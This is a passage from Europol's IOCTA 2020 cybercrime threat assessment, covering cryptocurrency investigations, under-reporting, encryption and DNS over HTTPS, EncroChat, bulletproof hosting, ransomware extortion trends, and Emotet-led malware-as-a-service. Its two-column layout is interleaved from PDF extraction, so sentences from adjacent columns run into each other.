and promises greater efficiency, higher
In Europe, the most important legislative development levels of automation and autonomy. AI is
in this area was a transposition of the 5th Anti- intrinsically a dual use technology: while it
Money Laundering Directive. The Directive states that can bring enormous benefits to society, AI
cryptocurrency exchanges and wallet providers who can also enable a range of digital, physical
own private keys of their clients are obliged entities,
and political threats. Therefore, the risks
mandating them, among other things, to a proper
and potential criminal abuse of AI systems
identification of their clients. The Directive obliges
need to be well understood in order to
all European Union Member States to implement
protect against malicious actors.
the legislation by January 2020. Twenty countries
have implemented it on time16 with more doing so For instance, criminals could make use of
throughout this year. While individual countries were AI to facilitate and improve their attacks
given a large degree of flexibility when transposing the by maximising opportunities for profit in a
Directive, this development contributed to a much- shorter time, exploiting new victims, and
needed harmonisation of legislation. creating more innovative criminal business
models, while reducing the chances of
The number of cryptocurrency automated teller
being caught. As ‘AI-as-a-Service’ becomes
machines (ATMs) is continuously growing and
more widespread, it lowers the entry
surpassed 9 000 ATMs around the world in 202017.
barrier to criminal activities by reducing
Traditionally, ATMs have often been perceived as
the skills and technical expertise needed
a way to privately obtain or sell cryptocurrency.
to employ it. This further exacerbates
Nevertheless, compliance also gradually improves, as
the potential for AI to be abused by
an increasing number of operators require customer
identification and flag suspicious transactions. criminals and become a driver of crime.
Concrete scenarios include AI malware,
AI-supported social engineering, AI-
based password guessing, AI-aided
Challenges to feature more prominently in reconnaissance or AI-facilitated content
future investigations creation, to mention a few.
A large number of factors have rendered It is therefore necessary, in close
cryptocurrency investigations more challenging and cooperation with industry and academia,
we can expect these to feature more prominently to develop a body of knowledge on the
in future investigations. These include centralised potential use of AI by criminals with a view
and decentralised mixing services, privacy coins,
to better anticipating possible malicious
exchanges with insufficient KYC requirements,
and criminal activities facilitated by AI, as
clandestine over-the-counter trading, nested services,
well as to prevent, respond to, or mitigate
where the exchange is incorporated within a wallet or
the effects of such attacks in a pro-active
another service and decentralised exchanges.
manner. Understanding of capabilities,
The obfuscation methods continue to develop. scenarios, and attack vectors is the key to
Centralised mixers troubled with exit scams and high enhancing preparedness and increasing
fees seem to be gradually replaced by non-custodial resilience.
mixing solutions where users do not need to send
bitcoins to a third party. Privacy-focused services
aside, the bitcoin protocol itself is expected to soon

implement features that will make it less transparent
to casual observers and investigators alike.
Cybercriminals will increasingly turn to marketplaces

that support decentralised transactions. More
Cryptocurrency as an investigation
marketplaces are likely to deprecate the traditional opportunity
centralised model with deposit and escrow accounts Cryptocurrency investigations have become
in favour of direct transactions between buyers an essential tool for many cybercrime
and sellers, decreasing the influence of market investigators. While the role of Europol is to
administrators and discouraging exit scams. support investigations in the Member States,
we could no longer ignore a high demand
for relevant practical training. To cope
with an increasing demand for a hands-on
e-learning experience Europol in cooperation
with CENTRIC launched CRYPTOPOL, an
educational game for investigators in October
1.5 CHALLENGES WITH 2019. CRYPTOPOL is accessible to all law
REPORTING PLAGUE ABILITY enforcement cryptocurrency investigators
around the world who can contact Europol
TO CREATE ACCURATE to request access to the game. As the game
OVERVIEW OF CRIME contains information about tracing techniques
used by law enforcement there is no intention
of making it publicly available.
Several interviewees indicated how they are unable

to provide a comprehensive overview of the number
and types of crimes executed within a particular crime
The other explanation for a lack of reporting from
area. This is the result of a number of factors. First,
victims, at least with respect to the general public, is a
the ability to register a specific crime is not always
lack of awareness. One interviewee indicated having
possible. Crime registration systems are diverse, and
witnessed a significant increase in cybercrime figures,
several interviewees indicated they were in a process
but offered as an explanation that it may in fact be the
of advancing their ability to gather more specific crime
result of greater awareness from the public. Others
reporting data, i.e. specifying what type of cybercrime
indicated there is no incentive to report as the focus is
took place. In one Member State, ransomware, for
on business continuity.
example, was not a separate category, as the country
maintains a general category for data breaches. Having Third, law enforcement at a national level often find
a general code for data breaches led to classification out about a potential case through the media or
problems, according to the Member State representative, through their local police. Crime registration at local
as different types of crimes fall into the same category. police level maintains its own challenges as local
police units may not have the expertise to assist a
Second, victims often do not report the crime. Crime
victim of cybercrime. Additionally, the information
reporting is a general problem as such receives attention
reported to local police may not find its way to
as part of a broader Victim Rights Strategy18. Victims
national or central units, meaning law enforcement at
may not see the value of doing so as law enforcement
is unable to connect the dots on a national scale and
have limited resources to conduct investigations. Yet,
with their respective international partners.
reporting the crime can also help law enforcement in
its quantitative justification to support the request for
more resources. Moreover, the more victims report a
crime, the more data law enforcement can gather and Cybercrime in the media
the more likely connections between different crimes
Law enforcement officials also indicated using media
can be established. One of the interviewees indicated
as a source of crime reporting, which is not the
how under-reporting prevents law enforcement from
preferred method as such reporting maintains its own
forming the bigger picture and gathering reliable data,
challenges. Cybercrime is a complicated area filled
and monitoring whether cybercrime has been increasing
with technical elements and cross-cutting issues,
or decreasing in reality.
blame on the victim, which harms

investigations. Law enforcement
YOU HOLD THE CARDS! view the media highlighting the more
Report online crime dramatic cases, while often ignoring the
low-value but high volume cybercrime.
When victims are essentially the only
24/7 possible source of information in
criminal cases, they are not likely to
Increase Dissuade Help be willing to share information on their
24/7 Protect
your the offenders law
chances
others from
from enforcement
victimisation. This is particularly true
becoming
of getting performing catch with BEC and ransomware. Media
victims
help more crimes the criminals reporting can turn the incident into
a scandal story, which could lead to
further victimisation and reputational
damage.
Report
Report Report child sexual
cybercrime illegal coercion
content and Using media for awareness
extortion raising
According to law enforcement and
private sector respondents, due to
the receptive nature of several media
outlets, there is substantial room to
work collaboratively with media to
which make it difficult to create a clear picture of
raise awareness of neglected areas of cybercrime
the landscape. A lack of understanding of key terms,
which have a substantial impact on EU citizens. There
concepts and a limited viewpoint have shaped the
are extensive calls to have clearer, more accurate
way mainstream media have portrayed cybercrime
representation of cybercrime to public audiences. Law
to wider audiences. Sophisticated emerging
enforcement are calling for prevention to be covered
technologies, human-relatable narratives, and high-
more extensively. If done right, the media could
profile cases (vis-à-vis victims or perpetrators) tend to
become a powerful actor in cybercrime prevention,
dominate media headlines.
for example by exposing the adoption of new kinds of
The complexity and terminological challenges of technologies and methods by cybercriminals.
cybercrime can lead to inconsistencies between what
Law enforcement has reported good reception
the media reports and what the security community
among media representatives in raising awareness of
says about an incident. It is also not helpful that
concrete cybercrime issues. Active presence on social
many companies name the same groups or attacks
media by law enforcement, and sending out notices
differently, enhancing the potential confusion. The
on cybercrime, is often well received by media and
complexity can lead to the perception of cybercrime
the public19. The media often picks up and shares the
as a highly sophisticated and intelligent field of crime.
story.
However, while for some cases this is an accurate
assessment, this perception may lead to neglect of
This is important, as, for example, phishing and social
the human element of cybercrime, which is much
engineering attacks rely on convincing humans to
less complex to comprehend. Additionally, there
fall for fraudulent activities, which makes raising
are many forms of cybercrime which are relatively
awareness on these threats potentially more impactful
unsophisticated, but which have substantial impact
than focusing on disseminating high profile incidents.
nonetheless. Cybercrime has a genuine human impact
As national media outlets often spearhead media
and individuals can do a lot to improve their resilience
reporting in Member States, it would be important
against different kinds of cyber threats if they are
for the public and private sectors to engage with
aware of them. Reporters may lack a coherent
them regularly, raise awareness and communicate
understanding of the cybercrime field, often mixing
elaborately the realities of the threat landscape, which
cyber-enabled fraud with cyber-dependent crime.
could help boost resilience against threats. People
usually report crimes more after certain information is
Where a high-profile incident occurs, an excessive
disseminated on threats.
focus on such cases may lead to indirect re-
victimisation and, in some cases, directly casting
1.6 LAW ENFORCEMENT ACCESS TO DATA CONTINUES

TO CHALLENGE INVESTIGATIONS
For several years now, the advancement and increased while positioned as a privacy-enhancing technology, it
implementation of certain technological developments still allows internet service providers (ISPs) to profile
have complicated the ability of law enforcement to users as other data points of the Hypertext Transfer
gain access to and gather relevant data for criminal Protocol (HTTP) traffic remain unencrypted.
investigations. One of the most prominent examples in
this regard remains the widespread use of encryption, Other related developments include the use of
which contains many benefits from a security cryptocurrencies by criminals, as indicated earlier
perspective but is also a development that criminals in this chapter. Whereas law enforcement, including
have gratefully used to their advantage20. Europol has Europol, continues to focus on improving capabilities
spoken about this in previous iterations of the IOCTA in the area of cryptocurrency tracing, significant
and jointly with Eurojust in its dedicated Observatory challenges remain.
Function reports in 2019 and 2020.
Encryption continues to become a mainstream

Encrochat investigation provides new
feature of an increasing number of services and
insights into organised crime
tools. One example is the Domain Name System
(DNS) over Hypertext Transfer Protocol Secure The value of being able to access data of criminal
(HTTPs). DNS is one of the most important databases communication becomes most apparent when law
in the internet infrastructure. Increased concern enforcement succeeds in gaining such access. The
over the monitoring of DNS traffic has led to the case of Encrochat, an encrypted phone network
standardisation of modern DNS resolution protocols widely used by criminals, is perhaps the most
that make use of encryption. One of the protocols, effective illustration of how encrypted data can
which received increased popularity and adoption is provide law enforcement with crucial leads beyond
DNS over HTTPS (DoH), after being introduced as a the cybercrime area. It should be emphasised that
default setting on the application level. Even though the platform targeted by this investigation catered
the DoH protocol was created to solve historical DNS specifically to the needs of criminals. The phones
concerns regarding security and privacy, the potential using the platform were provided pre-configured and
centralisation of DNS traffic around a handful of advertised to meet the needs of criminals and to
commercial and private organisations has arisen as secure the users against surveillance or investigation
a result. Tracing historical DNS records is an effective methods used by law enforcement parties. The
tool when it comes to criminal investigations. Access phones are sold guaranteeing anonymity utilising
to DNS queries is also used to great effect in dealing a network of re-sellers, which are often themselves
with botnets. Access to the network traffic between involved in other criminal activities, and are not
the criminal source and the remote DNS service distributed via regular retail outlets. In early 2020,
provider, however, will now barely be possible due EncroChat was one of the largest known providers
to traffic encryption, which will make the detection of encrypted digital communication with a very high
and blocking of malicious traffic, botnets and other share of users engaged in criminal activity. User
malicious applications impossible. hotspots were particularly present in source and
destination countries for cocaine and cannabis trade,
As queries to the DNS will be encrypted, ability to gain as well as in money laundering centres. In July 2020,
access to such data will be more complicated for law Europol reported on a joint investigation which made
enforcement, and countries hosting the majority of the it possible for law enforcement to intercept, share
DoH service providers will receive the vast majority of and analyse millions of messages that criminals
the internet DNS lookups, compared to the previous exchanged to plan serious crimes.
national decentralisation of these sensitive queries.
While the activities on EncroChat have ceased,
As a consequence of this, most of the DoH-related this complex operation shows the global scope of
investigations will involve international legal requests serious and organised crime and the connectivity of
to those jurisdictions. The DoH provider is likely to criminal networks who use advanced technologies
have a privacy policy in place, which will make it even to cooperate on a national and international level.
more difficult for law enforcement to receive the The information has already been relevant in a large
necessary information for crime investigations. Finally, number of ongoing criminal investigations, resulting
in the disruption of criminal activities including violent As an infrastructure element, BPH facilitates a broad
attacks, corruption, attempted murders and large- variety of key threats, including CSAM, terrorism-
scale drug transports. Certain messages indicated related content, command and control (C&C) servers
plans to commit imminent violent crimes and used in cyber-attacks as well as platforms for criminal-
triggered immediate action. to-criminal trade and discussion21. It is linked to
several threats in cyber-dependent and cyber-enabled
This investigation confirms that advanced crime, making it a key concern in the threat landscape.
technologies enable criminals to secretly As such, both the private and public sectors have a
communicate or transfer illicit goods and resources. key role to play in hindering a BPH criminal application.
There is a growing risk to public safety as organised This calls for cooperation internationally, as well as
crime are drawn to using encrypted communication an appropriate legislative framework which would
platforms that are almost technically impossible for hinder BPH providers from acting maliciously by
law enforcement to access. Due to these emerging hosting criminal interests. For example, regional
technologies used by criminals and the opportunities internet registries, local internet registries and ISPs
new technology may pose for law enforcement, an have a significant responsibility in maintaining data
even more intense thinking beyond law enforcement accuracy when sub-allocating IP addresses to network
cooperation is required, including with the private operators in order to maintain traceability, with
sector. regard to combatting BPH, as IP addresses have a
substantial role in BPH.
While the dismantling of EncroChat is a considerable
success against serious and organised crime and the BPH providers may run their own static servers to
result of a multi-national investigation, the ingredients host malicious content of their clients. BPH services
needed to come to such a success include the ideal have also registered as resellers with low-end service
combination of information, resources, skills, partners providers (for example ISPs, large hosting providers
and opportunity. This means this type of success is and content delivery networks) due to low-level
an exception as the rule remains that law enforcement verification and authentication requirements. With the
continues to battle the challenges of criminal use of growth of cloud services, a new modus operandi has
advanced technologies. emerged in which threat actors rent virtual private
servers from legitimate hosting providers using fake or
stolen identities. This highlights the need for stronger
Bulletproof hosters are the backbone of KYC policies with businesses and organisations
criminal infrastructure across the sector.
An important building block of the criminal

infrastructure is bulletproof hosting (BPH) – an
essential CaaS offering, which continues to be a
crucial facilitator for criminals and a hindrance for
law enforcement by challenging identification and
attribution efforts. BPH refers to a type of hosting or
Case example
hosting provider that earns its money by consciously
accepting perpetrators of crime as part of its clientele, In September 2019, German law
offering them technical infrastructure resilient to law enforcement managed to identify
enforcement disruption or takedown. There are some and arrest the main suspect running
hosting providers who may be negligent in acting on a BPH service from a bunker. This
illegal content or criminal activity hosted by them, BPH facilitated illicit marketplaces for
which is also an area of concern for law enforcement; various kinds of drugs, CSAM and CaaS.
however, the hosting providers that consciously act in Specifically, the WallStreet Market and
or support the interest of the criminals ought to be the Flugsvamp 2.0 were able to run on the
primary focus. These providers make their willingness servers of the bunker in Traben-Trarbach,
to support criminal activity part of their appeal and Germany22.
their business model. This is a crucial advantage for
criminals as hosting providers can play a central role
in allowing criminal activity to continue.
2 IOCTA 2020 _23
2 CRIME PRIORITY
Cyber-dependent crime
KEY FINDINGS
• Ransomware remains the • Ransomware on third-party • Emotet is omnipresent

most dominant threat as providers also creates through its versatile use
criminals increase the potential significant as it leads the way as a
pressure by threatening damage for other benchmark of modern
publication of data if organisations in the supply malware.
victims do not pay. chain as well as critical
infrastructure.
• The threat potential of
DDoS attacks is higher
than its current impact in
the EU.
_24 IOCTA 2020 Cyber-dependent crime
2.1 INTRODUCTION
The clear majority of law enforcement

respondents named ransomware as a top
priority threat yet again. As reported in previous
years’ IOCTA reports, ransomware remains
one of the, if not the, most dominant threat,
especially for public and private organisations
within as well as outside Europe. Besides
ransomware, European law enforcement
reported malware in the broader sense to be
widely present in cybercrime cases. Malware
attacks on organisations that play a crucial role
in the supply chains of major organisations
have been a significant development over the
past year. The third threat, the DDoS attack,
celebrated its 20th anniversary in 2019 and
ongoing investigations show that the DDoS
threat is still prevalent in the cyber landscape.
Cyber-dependent crime IOCTA 2020 _25
2.2 RANSOMWARE
The clear majority of law enforcement respondents brought was an increase of the attack surface, with
named ransomware as a top priority threat yet unmanaged endpoints/devices (PC systems) being
again. As reported in previous years’ IOCTA reports, remotely connected and having access to companies’
ransomware remains one of the, if not the, most information technology (IT) infrastructure. The fast
dominant threat, especially for public and private shift to telework made some companies ‘alleviate’
organisations within as well as outside Europe. some of their IT security policies and some IT security
What makes it even more challenging as a threat, is responsibility has been transferred to the individual
the impact it has on its victims. This victimisation users, where varying levels of (or lack of) associated
goes beyond the primary target, most often a public security training has created a new gap in security.
organisation or private business, as ransomware This gap has subsequently provided new ways
also affects those whose data is compromised. for cyber-actors to gain access to companies’ IT
Considering the scale of damage that ransomware infrastructure.
can inflict, victims also appear to be reluctant to come
forward to law enforcement authorities or the public Typically, ransomware attacks deployed against
when they have been victimised, which makes it more large corporations occur in different stages and
difficult to identify and investigate such cases. With are executed by different threat actors. The first
ransomware, criminals do not only abuse encryption initial step (performed by one group of criminals) of
to hide their identity and obfuscate their financial a ransomware infection is the computer/network
transactions but also actively abuse encryption as intrusion which is done by the use of multiple attack
part of their modus operandi. This leads to a situation vectors and malware types. The access is then
where they can almost act with impunity. sold to different cybercriminals that perform IT
infrastructure mapping, privilege escalation, lateral
move, data exfiltration etc. and finalised by deploying
the ransomware.
Ransomware is becoming increasingly
targeted
Criminals continued the trend introduced last year Ransomware and third-party providers
by making their ransomware attacks increasingly form a lethal combination
sophisticated and more targeted. The number of
targeted ransomware cases has increased over the Ransomware has shown to pose a significant indirect
past year, which has led to a significant increase in threat to businesses and organisations by targeting
threat actor capability as well as a higher impact on supply chains and third-party service providers.
victims. Europol has followed up on attacks on organisations
playing a key role in the supply chains of major
Ransomware attackers continue to target public financial institutions, which are believed to be an
and private sector organisations of various size, attempt by the attackers to enhance pressure on the
industry and nationality rather than individual personal victim to pay the ransom. Private sector respondents
computers (PCs). This enables threat actors to reported concerns over the differences in the IT
increase both the ransom amount requested and the security apparatus across supply chains, which leaves
probability of successfully making the victim pay the companies that play a key role as a service provider
ransom. Victim reconnaissance plays a significant vulnerable to attacks. These attacks then have an
role in the preparation of an attack. European law impact across the whole supply chain, which may
enforcement and Europol have observed attacks do substantial damage through long downtime or
targeting local governments and ministries; other information leaks for organisations indirectly affected
public sector organisations in healthcare and by the attack. One case saw an IT service provider
education (including hospitals, universities and high being attacked with Maze ransomware, which can sit
schools); as well as businesses in manufacturing, on the victim’s servers for several months. This allows
finance, energy, and transport industries. While the criminals to perform reconnaissance by monitoring
context of the COVID-19 pandemic crisis has affected internal communications in order to identify a key
the cybercrime field, ransomware attacks targeting moment, such as merging, selling, big meetings with
the healthcare industry took place well before the customers/sales, etc., for the deployment of the
crisis had a substantial effect in Europe and the US, ransomware. Criminals deploy the ransomware before
which suggests that the COVID-19 crisis was not a such events with the aim of putting pressure on the
trigger for these kinds of attacks23. What COVID-19 victim. At the same time, criminals can also exfiltrate
the data prior to the deployment of the ransomware attempted to auction data which it gathered from a
to have another means of pressuring the victim. The ransomware attack24. According to Member States
existing presence of the criminals on the victim’s and private sector respondents, several ransomware
servers is difficult to identify by security investigators families including Sodinokibi (also known as REvil),
as the security measures mainly focus on inbound Maze, Doppelpaymer, Nemty and Snatch published
detection. data which criminals stole from their victims over the
past year. In particular, the auctioning of the data by
criminal groups marks a new step and demonstrates
an escalation in methods aimed at coercing victims to
A perverse twist to guarantee payment:
pay the ransom. It is anticipated that other groups will
threatening to auction or wipe data
begin to adopt these coercive measures too.
Ransomware attackers have introduced a new way
of pressuring their victims to pay by stealing the Additionally, in the 2018 IOCTA Europol predicted
victim’s sensitive data and threatening to publish it scenarios in which fines for violating the GDPR could
online. Once criminals gain a foothold on victims’ be used by threat actors as additional leverage with
networks, which can be done in various ways, they regard to the threat of leaking their victim’s data
explore the networks and exfiltrate data, before online25. Both Member States and private sector
delivering the ransomware. If the victim fails to pay respondents witnessed this phenomenon over the
the ransom demand, attackers will post the victim’s past year. Some ransom notes specifically mention
sensitive data online or sell it to the highest bidder. GDPR fines to enhance the pressure on victims.
The group behind Sodinokibi ransomware has already
Fig. 1 A screenshot of a data auctioning session online26.
An alternative to the publication of data is its Investment costs for criminals increase,
destruction. Some ransomware families, such as but so do the potential profits
NotPetya have destructive wiper functionalities which
may cause irreversible damage to the victim. Europol While the overall investment cost of ransomware is
observed a case of destructive malware which took increasing, the amounts extorted by attackers have
place in 2020, in which attackers managed to rewrite increased too. Attackers who launch ransomware
the master boot record. attacks have requested ransom from anywhere
between less than a thousand to millions of euros. The
damages caused by e.g. downtime have increased
significantly as well. When targeting their victims,
European law enforcement found attackers surveying
their victims and assessing both the victim’s capacity
to pay (by reading e.g. financial reports) and the five thousand euros; and well-organised crime groups
most effective way of infecting as many machines as with better technical capabilities targeting higher-
possible during the attack. Attackers have also used value targets for ransom of up to millions of euros.
encrypted communication means (such as Protonmail, Threat actors have displayed significant adaptability
Tutanota and cock.li) and set up customer service in conducting lateral movement, reconnaissance and
portals – many times a hidden service on Tor darknet in establishing new footholds. Several stages are still
– to help facilitate the extortion process. executed through more manual steps (and again by
using legitimate tools) where lack of strong internal
Ransomware attackers are becoming increasingly controls and logging does not expose and reveal the
innovative in pursuing profits from the crime area. In suspicious activities. The availability of Ransomware-
addition to shifting to corporate and organisational as-a-Service (RaaS) on Darkweb marketplaces has
targets and finding new ways of adding leverage to also decreased the barrier of entry for new, less skilful
their extortion, threat actors are seen collaborating criminal actors. Lockbit, for example, which emerged in
with other criminals and adding new layers to January 2020, was brokered on underground forums
their attacks, including crypto mining. Increasingly for other cybercriminals to use27. However, on the
professional affiliate schemes are reflected in the opposite side, already established and mature RaaS
increase in migration among criminal affiliates, as was actors have raised the bar by including only trusted
seen with the migration from GandCrab to Sodinokibi. affiliates into affiliate programmes. These trusted
affiliates have previously displayed the capacity to
infect large companies. Affiliates that cannot infect
Ransomware attacks display higher skill, large companies or are inactive on the platform for
sophistication and adaptivity among threat more than one week are expelled (e.g. Sodinokibi).
actors
The business-type nature of ransomware attackers
Ransomware attacks continue to be a relatively is also demonstrated in their engagement in online
diverse, low risk and easy way for cybercriminals to public relations activities. Some ransomware groups
acquire money. The level of sophistication also varies conduct their own information campaigns to advance
across threat actors. European law enforcement their goals. The Maze ransomware group for example
reported at least two distinct types of ransomware released a statement on their website claiming that
actors: lone actors who utilise data and services from they would ‘spare’ healthcare organisations during
Darkweb market places, who demand ransom up to the COVID-19 pandemic crisis. This turned out to be
Ransomware TIPS & ADVICE
THE MALWARE THAT HOLDS YOUR

DATA HOSTAGE FOR A PRICE
Ransomware prevents users from accessing their
system or devices, asking them to pay a ransom through
certain online payment methods by an established
deadline in order to regain control of their data.
HOW DOES IT SPREAD?
Visiting compromised Clicking on malicious

websites links and attachments
Downloading fake Connecting infected external

application updates or devices (such as USBs) to your
compromised software computer system
disinformation, as the group allegedly attacked an limiting reputational damage (see Chapter 1). The
urgent care centre in Texas soon after their release shift in ransomware targeting individual PCs to more
(refusing to pay ransom, Maze continued to publicise high-value targets such as businesses and public
stolen patient data)28. The Maze group was also sector organisations introduces unique challenges
allegedly behind an attack on the Hammersmith to law enforcement investigations. Private and public
Medicines Research facility in the UK, who have been sector victims of ransomware are disproportionately
involved in developing vaccines for the COVID-19 more affected by the threat of leaking data compared
virus29. to ransomware cases in which PCs and individual
persons were affected. Negative publicity leading to
Both Member States and private sector respondents reputational fallout may lead to re-victimisation, which
have noticed an increase in subcontracting and may prevent victims from coming forward to law
cooperation among threat actors, which has improved enforcement authorities with information which could
their capabilities. Similarities in how criminals be crucial in identifying and catching the perpetrators.
behind the trio Ryuk ransomware, Trickbot and Victims prefer to engage with private sector security
Emotet malware operate suggests that criminals firms for investigating the attack or negotiating with
across different attack approaches could either the extortionists to manage the crises triggered by
belong to the same overall structure, or that they ransomware (some IT security firms hire specialist
are becoming smarter at cooperating with each negotiators, some of whom get discounts from
other. Well-organised criminal groups who engage in organised crime groups). Some of the companies
ransomware, have been observed by European law that negotiate the ransom payment are working on
enforcement cooperating over malware, infrastructure the edge of legality, as they have developed a trusted
and money laundering activities. The relationship business relationship with the ransomware actors.
between Emotet, Ryuk and Trickbot is considered one
of the most notable in the cybercrime world. Companies are normally referenced by cybercriminals
in their negotiations as a proof or ledger that the
Some ransomware actors have also grown more victim’s data will be decrypted after the ransom
cautious. Member States and private sector payment. Some of these companies negotiate behind
respondents reported that some of the actors behind the scenes with the ransomware actors to obtain
ransomware attacks have become less vocal on a bigger discount from the ransom payment. Other
underground forums, setting up alerts and alarms. companies might reflect this discount in the victim’s
They have also been observed using additional invoice, others may not. Cyber actors provide ransom
VPN layers and cryptocurrencies with mixers and discounts to victims if they use the services of specific
swappers to hide their tracks. According to European companies. By using such companies, victims will
law enforcement, attackers have also found a way not file an official complaint, which increases the lack
of using C&C servers when deploying malware to of visibility and awareness concerning real figures of
place the payload into the memory of the company’s ransomware attacks among law enforcement. Not
servers. This way there is no trace on the victim’s reporting cases to law enforcement agencies will
hard disk and no way of recreating it once it is gone obviously hamper any efforts, as important evidence
from memory. The IOCTA 2018 and 2019 include a and intelligence from different cases can be missed.
section on file-less malware as an emerging threat in
cyber-dependent crime, and the IOCTA 2018 included Furthermore, a case involving personal computers
a forecast that file-less malware would become an being targeted by ransomware shows that victims
increasingly standard component of CaaS offerings by had opted to purchase new machines rather than
2023. report the event to law enforcement. Here victims
were stunned when they were contacted by law
enforcement over the ransomware attacks, and were
under the impression that law enforcement would not
Ransomware remains an under-reported
do anything about the situation.
crime
Several law enforcement authorities mentioned
identifying ransomware cases through (local)
media and approaching victims to assist them by
potentially starting a criminal investigation. This was
not generally a priority of the victim organisation, as
the primary focus was on business continuity and
2.3 MALWARE
Besides ransomware, European law enforcement

reported malware in the broader sense to be Ransomware case example
widely present in cybercrime cases. Criminals Criminals targeted a London-based
have converted some traditional banking Trojans foreign currency exchange Travelex
into modular malware to cover a broader scope with Sodinokibi ransomware in the first
of collection of PC digital fingerprints collection weeks of 2020. The company had over
and are being sold to cover different needs (e.g. 1 000 stores and 1 000 ATMs in over 26
droppers, exfiltration, etc.). These advanced forms countries. Travelex was also a third-party
of modular malware are a top threat in the EU.
service provider for several well-known
According to European law enforcement, incidents
financial institutions internationally.
have been steadily increasing over the past year
As the attack left Travelex’s services
and are likely to rise significantly later in 2020.
disrupted for several weeks, this had
Malware typically includes Trojans and remote
varying impacts across the whole
access tools (RATs), which allow criminals to gain
supply chain. The criminals encrypted
remote control over infected computers. Some
Travelex’s data and allegedly managed
threat actors use techniques similar to those in the
past in some cases resurrecting old exploit codes to exfiltrate five gigabytes of sensitive
when taking advantage of hygiene security issues, data from Travelex, including personal
such as the targeting of unpatched structured data, social security numbers, dates
query language (SQL) vulnerabilities, making of birth and payment card information,
traditional attack methods still worthwhile. which it subsequently threatened to make
public if Travelex did not pay the ransom.
The level of complexity varies across malware The company managed to restore
attacks. Several groups have proven more adaptive its operations soon after, but it was
and capable than others. Some groups can utilise reported that Travelex paid the USD 2.3
malware to attack higher value targets with a million ransom to the attackers. It is not
more targeted approach, performing research and advisable for victims to pay the ransom,
reconnaissance on their victims, whereas other as there is no guarantee the victim will
less experienced actors engage in lower impact, gain their data back nor that similar
massive attacks.
attacks will not happen in the future.
Malware attacks have been targeting

third-party providers
Malware attacks on organisations that play
a crucial role in the supply chains of major
organisations have been a significant development
over the past year. Similarly, with ransomware,
other forms of malware targeting third-party or
outsourced service providers put supply chains
at significant risk, as the impacts of such attacks
could involve data leaks or major disruptions, as
well as knock-on or cascading effects. Private
sector respondents reported a growing number of
attacks on third-party service providers; however, it
is unclear whether attackers intended to impact the
supply chain in all cases.
In one case, a private sector respondent reported

one of their third-party service providers had been
targeted by Emotet malware which led to a high-
risk situation at the respondent’s organisation.
Attackers were studying old email threads between European law enforcement case
the targeted company and the respondent carefully, study
trying to embed themselves into the conversation
European law enforcement have
naturally using highly tailored messages to gather
witnessed some perpetrators using
information. Staff at the respondent’s organisation
trusted third-party services in their
grew suspicious when new names and email
malware attacks, including Amazon
addresses were following up on months old
Web Cloud and Google Drive. The most
threads, and so they reported the messages as
downloaded PowerShell scripts are online
suspicious. This case shows that threat actors put
text paste tools, such as Pastebin. These
considerable effort and preparation into an attack.
scripts are then executed in memory,
making forensic analysis more difficult
(what is known as file-less malware).
Emotet leads the way as the benchmark Using phishing emails or malware
of modern malware as malware variants payloads, threat actors are using the
evolve legitimacy of these services to trick
The evolution of Emotet and Trickbot malware their users. While this modus operandi
shows how adaptive the malware threat is. The has been around for a few years already,
Emotet banking Trojan – which is mentioned as 2019 saw a significant development.
the top malware threat affecting the EU by both Cybercriminals hack legitimate sites
Member States and private sector respondents (for example those run on WordPress)
– has been used by cybercriminals to deliver to house various payloads and malware,
other malicious malware payloads such as Ryuk using them as ‘stagers’ to upload malware
ransomware and Trickbot. The developers behind and phishing sites within them.
Trickbot added a ‘Trickbooster botnet’ (a spam
booster) to the malware. These developments
signal an evolution in the malware and their
capabilities.
Emotet is highly professional and aggressive as

it seeks to maximise its profits. Private sector
respondents suggest Emotet is a benchmark for
modern malware with over 200 000 unique versions
observed globally. The group behind Emotet seems
to take long breaks over the summer and when they
return in the autumn, they become highly active
again. Other top malware threats affecting Europe as
reported by private sector respondents include Lokibot,
which stores login credential information from web
browsers and data related to cryptocurrency wallets,
and Qakbot, another modular banking Trojan known
to facilitate ransomware infections on corporate
networks.
Crime-as-a-Service (CaaS) enhances reach as malware developers often use encryption to

of attacks frustrate law enforcement and industry efforts in
analysing the functionality of malware and assign
Prolific malware, which criminals turn into commodity attribution to specific crime groups.
malware for others to use, is cause for concern.
Threat actors collude with one another by sharing
infrastructure, services and compromised credentials.
Mobile malware remain relatively stable
Commodity malware and Malware-as-a-Service
(MaaS) lower barriers for threat actors wanting to As more and more cashless payment transactions
engage in cyber-attacks. have emerged in the mobile scene, mobile threats
such as mobile malware targeting cashless payment
Despite a substantial decrease in exploit kits on
methods continue to grow. Mobile malware has
underground markets, prolific malware such as
yet to reach scalability as a sustainable business
Emotet and Trickbot have successfully filled the void.
for cybercriminals, at least when contrasted with
Both Emotet and Trickbot use modular structures
traditional banking Trojans. This is likely due to
to enable reselling and renting sections of their
the limited transactions (with a cap typically set at
malware to their rivals without compromising their key
around €50) which are enabled with mobile payments.
differentiators. “TrickBot likely is operated by a single
Launching mobile malware attacks requires significant
group as a MaaS platform that caters to a relatively
effort compared to other attack varieties which
small number of top-tier cybercriminals. Available
further offer larger payouts, which means they are
information leads us to believe that individual TrickBot
likely conducted by less funded, amateur actors.
campaigns can be attributed to these different
European law enforcement also detected first signs
customers using the group tag parameter, and each
of mobile payment fraud with attempted fraudulent
customer may bring their own tactics, techniques and
transactions using app-based systems. Investigations
procedures and engage in highly targeted attacks30.”
are underway and it is unclear currently whether this
involved mobile malware.
By doing the heavy lifting in acquiring access to a
target’s systems, Emotet can provide Access-as-a-
Service (AaaS) to other cybercriminals. These other
criminals can focus on monetising the opportunity
with some other second stage malware. Competing
solutions for electronic skimming (e-skimming) and
JavaScript skimmers, with varying capabilities, each
with the goal of compromising online merchant
websites by harvesting payment card data, have
also been offered as a service on the Darkweb by
cybercriminals. These will be elaborated further in
Chapter 4.
Simultaneously, European law enforcement has

reported a rise in less tech-savvy cybercriminals in
the context of widely available CaaS solutions. There
has been an observable shift from what used to be
a business for threat actors, now being more of an
enterprise. Where specialist skills are needed (e.g.
malware-coding, malware-distribution), criminals are
able to hire developers or consultants to fill this need.
This highlights increased professionalisation in the
cybercrime threat landscape.
Through using combination attacks, criminals

effectively challenge law enforcement’s capacity to
investigate incidents and attribute attacks to specific
perpetrators and crime groups. Malware combinations
add layers of complexity to law enforcement
investigations. Encryption also presents a challenge,
2.4 DDoS
In 2019, the DDoS attack celebrated its 20th DDoS has become increasingly adaptive
anniversary. Ongoing investigations show that the
DDoS threat is still prevalent in the cyber landscape. Cybercriminals who engage in DDoS attacks have
However, this topic has also had several success adapted against increasingly robust protection
